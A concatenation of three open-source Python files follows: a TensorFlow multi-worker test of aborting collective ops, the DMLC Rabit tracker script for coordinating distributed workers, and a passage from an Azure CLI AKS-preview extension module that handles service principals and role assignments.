TFConfigClusterResolver()))
@combinations.generate(
combinations.times(
combinations.combine(
mode="eager", num_workers=2, runner=two_worker_pool_runner),
device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def testAbortCommunication(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal all-reduce to complete the group and instance
# resolution.
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testAbortGroupParamsResolution(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key,
instance_key)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key,
instance_key)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key)
def testAbortInstanceParamsResolution(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal all-reduce to complete the group resolution.
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key)
# We use broadcast to test aborting instance resolution since only broadcast
# waits for the group.
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
# Reassign instance_key so that it's the same on each worker.
instance_key = 100
with ops.device(dev0):
if cluster_resolver.task_id == 0:
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
else:
collective_ops.broadcast_recv((1,), dtypes.float32, group_size,
group_key, instance_key)
if __name__ == "__main__":
multi_process_runner.test_main()
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
if magic != kMagic:
logging.warning(
'invalid magic number=%d from %s, There are several possible situations: \n 1. The tracker process is killed \n 2. Another service is sending a request to the port process corresponding to the tracker' % (
magic, self.host))
logging.warning('you can run "python tracker.py --num-workers=1"')
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
def alive(self):
return self.thread.isAlive()
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True, executable='/bin/bash')), args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def alive(self):
if self.cmd is not None:
return self.thread.isAlive()
else:
return False
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
if rabit.alive():
fun_submit(nworker, nserver, envs)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
if pserver.alive():
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
help='Number of worker proccess to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
help='Number of server process to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
help=('Host IP addressed, this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(stream=sys.stdout, format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
read_file_content,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_nodepool_snapshots_client,
cf_mc_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_03_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
ManagedClusterSnapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
